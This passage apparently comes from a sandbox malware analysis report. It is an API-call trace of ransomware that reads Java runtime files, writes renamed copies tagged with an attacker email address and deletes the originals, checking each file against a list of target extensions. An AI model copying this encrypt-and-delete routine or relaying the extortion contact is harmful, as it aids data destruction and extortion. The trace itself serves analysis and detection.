lpBuffer=0x3f3a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesRead=0x34dfecc*=0xca750, lpOverlapped=0x0) returned 1 [0198.048] WriteFile (in: hFile=0x3a0, lpBuffer=0x3f3a020*, nNumberOfBytesToWrite=0xca760, lpNumberOfBytesWritten=0x34dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesWritten=0x34dfc94*=0xca760, lpOverlapped=0x0) returned 1 [0198.270] ReadFile (in: hFile=0x350, lpBuffer=0x3f3a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesRead=0x34dfecc*=0x0, lpOverlapped=0x0) returned 1 [0198.270] WriteFile (in: hFile=0x3a0, lpBuffer=0x3f3a020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x34dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesWritten=0x34dfc94*=0xec, lpOverlapped=0x0) returned 1 [0198.270] SetEndOfFile (hFile=0x3a0) returned 1 [0198.270] CloseHandle (hObject=0x3a0) returned 1 [0198.270] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34dfec0 | out: lpNewFilePointer=0x0) returned 1 [0198.270] SetEndOfFile (hFile=0x350) returned 1 [0198.276] CloseHandle (hObject=0x350) returned 1 [0198.276] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\msvcr100.dll.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0198.277] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\msvcr100.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\msvcr100.dll")) returned 1 [0198.277] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\msvcr100.dll") returned 51 [0198.277] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\msvcr100.dll") returned 51 [0198.277] lstrlenW (lpString=".doc") returned 4 [0198.277] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0198.277] lstrlenW (lpString=".docx") returned 5 [0198.277] lstrcmpiW (lpString1=".docx", lpString2="0.dll") returned -1 [0198.277] lstrlenW (lpString=".pdf") returned 4 [0198.277] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0198.277] lstrlenW (lpString=".xls") returned 4 [0198.277] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0198.277] lstrlenW (lpString=".xlsx") returned 5 [0198.277] lstrcmpiW (lpString1=".xlsx", lpString2="0.dll") returned -1 [0198.277] lstrlenW (lpString=".ppt") returned 4 [0198.277] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0198.277] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\msvcr100.dll") returned 51 [0198.277] lstrlenW (lpString=".zip") returned 4 [0198.277] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0198.277] lstrlenW (lpString=".rar") returned 4 [0198.277] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0198.277] lstrlenW (lpString=".bz2") returned 4 [0198.277] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0198.277] lstrlenW (lpString=".7z") returned 3 [0198.277] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0198.277] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\msvcr100.dll") returned 51 [0198.277] lstrlenW (lpString=".dbf") returned 4 [0198.278] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0198.278] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\msvcr100.dll") returned 51 [0198.278] lstrlenW (lpString=".1cd") returned 4 [0198.278] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0198.278] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\msvcr100.dll") returned 51 [0198.278] lstrlenW (lpString=".jpg") returned 4 [0198.278] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0198.278] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\msvcr100.dll") returned 51 [0198.278] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\msvcr100.dll") returned 51 [0198.278] lstrlenW (lpString=".doc") returned 4 [0198.278] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0198.278] lstrlenW (lpString=".docx") returned 5 [0198.278] lstrcmpiW (lpString1=".docx", lpString2="0.dll") returned -1 [0198.278] lstrlenW (lpString=".pdf") returned 4 [0198.278] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0198.278] lstrlenW (lpString=".xls") returned 4 [0198.278] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0198.278] lstrlenW (lpString=".xlsx") returned 5 [0198.278] lstrcmpiW (lpString1=".xlsx", lpString2="0.dll") returned -1 [0198.278] lstrlenW (lpString=".ppt") returned 4 [0198.278] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0198.278] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\msvcr100.dll") returned 51 [0198.278] lstrlenW (lpString=".zip") returned 4 [0198.278] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0198.278] lstrlenW (lpString=".rar") returned 4 [0198.278] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0198.278] lstrlenW (lpString=".bz2") returned 4 [0198.278] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0198.278] lstrlenW (lpString=".7z") returned 3 [0198.278] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0198.278] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\msvcr100.dll") returned 51 [0198.278] lstrlenW (lpString=".dbf") returned 4 [0198.278] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0198.279] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\msvcr100.dll") returned 51 [0198.279] lstrlenW (lpString=".1cd") returned 4 [0198.279] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0198.279] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\msvcr100.dll") returned 51 [0198.279] lstrlenW (lpString=".jpg") returned 4 [0198.279] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0198.279] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0198.279] lstrlenW (lpString="net.dll") returned 7 [0198.279] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\net.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\net.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0198.279] GetFileSizeEx (in: hFile=0x350, lpFileSize=0x34dff14 | out: lpFileSize=0x34dff14*=96832) returned 1 [0198.279] CloseHandle (hObject=0x350) returned 1 [0198.279] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\net.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\net.dll")) returned 0x20 [0198.280] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\net.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\net.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0198.280] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\net.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\net.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0198.280] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34dfec0 | out: lpNewFilePointer=0x0) returned 1 [0198.280] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34dfec0 | out: lpNewFilePointer=0x0) returned 1 [0198.280] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\net.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\net.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0 [0198.280] GetLastError () returned 0x0 [0198.280] ReadFile (in: hFile=0x350, lpBuffer=0x3f3a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesRead=0x34dfecc*=0x17a40, lpOverlapped=0x0) returned 1 [0198.395] WriteFile (in: hFile=0x3a0, lpBuffer=0x3f3a020*, nNumberOfBytesToWrite=0x17a50, lpNumberOfBytesWritten=0x34dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesWritten=0x34dfc94*=0x17a50, lpOverlapped=0x0) returned 1 [0198.398] ReadFile (in: hFile=0x350, lpBuffer=0x3f3a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesRead=0x34dfecc*=0x0, lpOverlapped=0x0) returned 1 [0198.398] WriteFile (in: hFile=0x3a0, lpBuffer=0x3f3a020*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x34dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesWritten=0x34dfc94*=0xe2, lpOverlapped=0x0) returned 1 [0198.398] SetEndOfFile (hFile=0x3a0) returned 1 [0198.398] CloseHandle (hObject=0x3a0) returned 1 [0198.398] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34dfec0 | out: lpNewFilePointer=0x0) returned 1 [0198.398] SetEndOfFile (hFile=0x350) returned 1 [0198.400] CloseHandle (hObject=0x350) returned 1 [0198.400] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\net.dll.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0198.400] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\net.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\net.dll")) returned 1 [0198.400] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\net.dll") returned 46 [0198.400] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\net.dll") returned 46 [0198.400] lstrlenW (lpString=".doc") returned 4 [0198.400] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0198.400] lstrlenW (lpString=".docx") returned 5 [0198.401] lstrcmpiW (lpString1=".docx", lpString2="t.dll") returned -1 [0198.401] lstrlenW (lpString=".pdf") returned 4 [0198.401] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0198.401] lstrlenW (lpString=".xls") returned 4 [0198.401] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0198.401] lstrlenW (lpString=".xlsx") returned 5 [0198.401] lstrcmpiW (lpString1=".xlsx", lpString2="t.dll") returned -1 [0198.401] lstrlenW (lpString=".ppt") returned 4 [0198.401] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0198.401] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\net.dll") returned 46 [0198.401] lstrlenW (lpString=".zip") returned 4 [0198.401] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0198.401] lstrlenW (lpString=".rar") returned 4 [0198.401] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0198.401] lstrlenW (lpString=".bz2") returned 4 [0198.401] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0198.401] lstrlenW (lpString=".7z") returned 3 [0198.401] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0198.401] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\net.dll") returned 46 [0198.401] lstrlenW (lpString=".dbf") returned 4 [0198.401] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0198.401] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\net.dll") returned 46 [0198.401] lstrlenW (lpString=".1cd") returned 4 [0198.401] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0198.401] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\net.dll") returned 46 [0198.401] lstrlenW (lpString=".jpg") returned 4 [0198.401] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0198.401] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\net.dll") returned 46 [0198.402] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\net.dll") returned 46 [0198.402] lstrlenW (lpString=".doc") returned 4 [0198.402] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0198.402] lstrlenW (lpString=".docx") returned 5 [0198.402] lstrcmpiW (lpString1=".docx", lpString2="t.dll") returned -1 [0198.402] lstrlenW (lpString=".pdf") returned 4 [0198.402] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0198.402] lstrlenW (lpString=".xls") returned 4 [0198.402] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0198.402] lstrlenW (lpString=".xlsx") returned 5 [0198.402] lstrcmpiW (lpString1=".xlsx", lpString2="t.dll") returned -1 [0198.402] lstrlenW (lpString=".ppt") returned 4 [0198.402] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0198.402] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\net.dll") returned 46 [0198.402] lstrlenW (lpString=".zip") returned 4 [0198.402] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0198.402] lstrlenW (lpString=".rar") returned 4 [0198.402] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0198.402] lstrlenW (lpString=".bz2") returned 4 [0198.402] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0198.402] lstrlenW (lpString=".7z") returned 3 [0198.402] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0198.402] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\net.dll") returned 46 [0198.402] lstrlenW (lpString=".dbf") returned 4 [0198.402] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0198.402] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\net.dll") returned 46 [0198.402] lstrlenW (lpString=".1cd") returned 4 [0198.402] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0198.402] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\net.dll") returned 46 [0198.402] lstrlenW (lpString=".jpg") returned 4 [0198.402] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0198.403] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0198.403] lstrlenW (lpString="nio.dll") returned 7 [0198.403] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\nio.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\nio.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0198.403] GetFileSizeEx (in: hFile=0x350, lpFileSize=0x34dff14 | out: lpFileSize=0x34dff14*=60480) returned 1 [0198.403] CloseHandle (hObject=0x350) returned 1 [0198.403] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\nio.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\nio.dll")) returned 0x20 [0198.404] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\nio.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\nio.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0198.404] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\nio.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\nio.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0198.404] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34dfec0 | out: lpNewFilePointer=0x0) returned 1 [0198.404] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34dfec0 | out: lpNewFilePointer=0x0) returned 1 [0198.404] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\nio.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\nio.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0 [0198.404] GetLastError () returned 0x0 [0198.405] ReadFile (in: hFile=0x350, lpBuffer=0x3f3a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesRead=0x34dfecc*=0xec40, lpOverlapped=0x0) returned 1 [0198.491] WriteFile (in: hFile=0x3a0, lpBuffer=0x3f3a020*, nNumberOfBytesToWrite=0xec50, lpNumberOfBytesWritten=0x34dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesWritten=0x34dfc94*=0xec50, lpOverlapped=0x0) returned 1 [0198.492] ReadFile (in: hFile=0x350, lpBuffer=0x3f3a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesRead=0x34dfecc*=0x0, lpOverlapped=0x0) returned 1 [0198.492] WriteFile (in: hFile=0x3a0, lpBuffer=0x3f3a020*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x34dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesWritten=0x34dfc94*=0xe2, lpOverlapped=0x0) returned 1 [0198.492] SetEndOfFile (hFile=0x3a0) returned 1 [0198.492] CloseHandle (hObject=0x3a0) returned 1 [0198.492] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34dfec0 | out: lpNewFilePointer=0x0) returned 1 [0198.492] SetEndOfFile (hFile=0x350) returned 1 [0198.493] CloseHandle (hObject=0x350) returned 1 [0198.493] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\nio.dll.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0198.494] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\nio.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\nio.dll")) returned 1 [0198.494] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\nio.dll") returned 46 [0198.494] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\nio.dll") returned 46 [0198.494] lstrlenW (lpString=".doc") returned 4 [0198.494] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0198.494] lstrlenW (lpString=".docx") returned 5 [0198.494] lstrcmpiW (lpString1=".docx", lpString2="o.dll") returned -1 [0198.494] lstrlenW (lpString=".pdf") returned 4 [0198.494] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0198.494] lstrlenW (lpString=".xls") returned 4 [0198.494] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0198.494] lstrlenW (lpString=".xlsx") returned 5 [0198.494] lstrcmpiW (lpString1=".xlsx", lpString2="o.dll") returned -1 [0198.494] lstrlenW (lpString=".ppt") returned 4 [0198.494] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0198.494] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\nio.dll") returned 46 [0198.494] lstrlenW (lpString=".zip") returned 4 [0198.494] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0198.494] lstrlenW (lpString=".rar") returned 4 [0198.494] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0198.494] lstrlenW (lpString=".bz2") returned 4 [0198.494] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0198.494] lstrlenW (lpString=".7z") returned 3 [0198.494] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0198.494] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\nio.dll") returned 46 [0198.494] lstrlenW (lpString=".dbf") returned 4 [0198.494] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0198.494] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\nio.dll") returned 46 [0198.494] lstrlenW (lpString=".1cd") returned 4 [0198.494] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0198.494] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\nio.dll") returned 46 [0198.494] lstrlenW (lpString=".jpg") returned 4 [0198.495] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0198.495] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\nio.dll") returned 46 [0198.495] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\nio.dll") returned 46 [0198.495] lstrlenW (lpString=".doc") returned 4 [0198.495] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0198.495] lstrlenW (lpString=".docx") returned 5 [0198.495] lstrcmpiW (lpString1=".docx", lpString2="o.dll") returned -1 [0198.495] lstrlenW (lpString=".pdf") returned 4 [0198.495] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0198.495] lstrlenW (lpString=".xls") returned 4 [0198.495] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0198.495] lstrlenW (lpString=".xlsx") returned 5 [0198.495] lstrcmpiW (lpString1=".xlsx", lpString2="o.dll") returned -1 [0198.495] lstrlenW (lpString=".ppt") returned 4 [0198.495] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0198.495] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\nio.dll") returned 46 [0198.495] lstrlenW (lpString=".zip") returned 4 [0198.495] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0198.495] lstrlenW (lpString=".rar") returned 4 [0198.495] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0198.495] lstrlenW (lpString=".bz2") returned 4 [0198.495] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0198.495] lstrlenW (lpString=".7z") returned 3 [0198.495] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0198.495] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\nio.dll") returned 46 [0198.495] lstrlenW (lpString=".dbf") returned 4 [0198.495] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0198.495] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\nio.dll") returned 46 [0198.495] lstrlenW (lpString=".1cd") returned 4 [0198.495] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0198.495] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\nio.dll") returned 46 [0198.495] lstrlenW (lpString=".jpg") returned 4 [0198.495] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0198.496] lstrcmpiW (lpString1=".exe", lpString2=".bat") returned 1 [0198.496] lstrlenW (lpString="orbd.exe") returned 8 [0198.496] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\orbd.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\orbd.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0198.496] GetFileSizeEx (in: hFile=0x350, lpFileSize=0x34dff14 | out: lpFileSize=0x34dff14*=16448) returned 1 [0198.496] CloseHandle (hObject=0x350) returned 1 [0198.496] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\orbd.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\orbd.exe")) returned 0x20 [0198.496] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\orbd.exe.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\orbd.exe.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0198.496] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\orbd.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\orbd.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0198.496] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34dfec0 | out: lpNewFilePointer=0x0) returned 1 [0198.497] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34dfec0 | out: lpNewFilePointer=0x0) returned 1 [0198.497] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\orbd.exe.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\orbd.exe.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0 [0198.497] GetLastError () returned 0x0 [0198.497] ReadFile (in: hFile=0x350, lpBuffer=0x3f3a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesRead=0x34dfecc*=0x4040, lpOverlapped=0x0) returned 1 [0198.505] WriteFile (in: hFile=0x3a0, lpBuffer=0x3f3a020*, nNumberOfBytesToWrite=0x4050, lpNumberOfBytesWritten=0x34dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesWritten=0x34dfc94*=0x4050, lpOverlapped=0x0) returned 1 [0198.506] ReadFile (in: hFile=0x350, lpBuffer=0x3f3a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesRead=0x34dfecc*=0x0, lpOverlapped=0x0) returned 1 [0198.506] WriteFile (in: hFile=0x3a0, lpBuffer=0x3f3a020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x34dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesWritten=0x34dfc94*=0xe4, lpOverlapped=0x0) returned 1 [0198.506] SetEndOfFile (hFile=0x3a0) returned 1 [0198.506] CloseHandle (hObject=0x3a0) returned 1 [0198.506] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34dfec0 | out: lpNewFilePointer=0x0) returned 1 [0198.506] SetEndOfFile (hFile=0x350) returned 1 [0198.507] CloseHandle (hObject=0x350) returned 1 [0198.507] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\orbd.exe.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0198.507] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\orbd.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\orbd.exe")) returned 1 [0198.508] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\orbd.exe") returned 47 [0198.508] lstrlenW 